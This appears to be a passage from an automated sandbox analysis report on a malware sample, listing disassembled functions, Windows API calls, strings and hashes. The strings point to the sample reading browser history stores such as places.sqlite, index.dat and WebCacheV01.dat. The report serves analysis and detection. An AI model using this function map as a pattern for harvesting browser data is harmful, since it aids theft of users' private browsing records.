                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 2911713577-0
                                                                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmp
                                                                              • String ID: @ $SQLite format 3
                                                                              • API String ID: 1475443563-3708268960
                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpqsort
                                                                              • String ID: /nosort$/sort
                                                                              • API String ID: 1579243037-1578091866
                                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                              Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040E60F
                                                                              • memset.MSVCRT ref: 0040E629
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Strings
                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                              • API String ID: 2887208581-2114579845
                                                                              • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                              • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                              Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                              Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(00650048), ref: 0044DF01
                                                                              • ??3@YAXPAX@Z.MSVCRT(007B7790), ref: 0044DF11
                                                                              • ??3@YAXPAX@Z.MSVCRT(007B7FA0), ref: 0044DF21
                                                                              • ??3@YAXPAX@Z.MSVCRT(007B7B98), ref: 0044DF31
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@
                                                                              • String ID:
                                                                              • API String ID: 613200358-0
                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                              Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                              • API String ID: 2221118986-1725073988
                                                                              • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                              • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                              Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00412794,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00414BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                              • API String ID: 2773794195-880857682
                                                                              • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                              • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@
                                                                              • String ID:
                                                                              • API String ID: 1033339047-0
                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                              Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                              • memcmp.MSVCRT ref: 00444BA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$memcmp
                                                                              • String ID: $$8
                                                                              • API String ID: 2808797137-435121686
                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                              Function 00405220 Relevance: 4.6, APIs: 3, Instructions: 88libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                              • _mbscat.MSVCRT ref: 0040525B
                                                                              • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 966727022-0
                                                                              • Opcode ID: c765794f54d76aa96f7cbbd704376dd7e24dc159ae60cf9a2403a0e69002e1a0
                                                                              • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                              • Opcode Fuzzy Hash: c765794f54d76aa96f7cbbd704376dd7e24dc159ae60cf9a2403a0e69002e1a0
                                                                              • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                              • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                              • String ID:
                                                                              • API String ID: 1979745280-0
                                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                              Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                              • free.MSVCRT ref: 00418803
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                              • String ID:
                                                                              • API String ID: 1355100292-0
                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                              Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                              • memset.MSVCRT ref: 00403A55
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                              • String ID: history.dat$places.sqlite
                                                                              • API String ID: 2641622041-467022611
                                                                              • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                              • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                              Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$File$PointerRead
                                                                              • String ID:
                                                                              • API String ID: 839530781-0
                                                                              • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                              • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID: *.*$index.dat
                                                                              • API String ID: 1974802433-2863569691
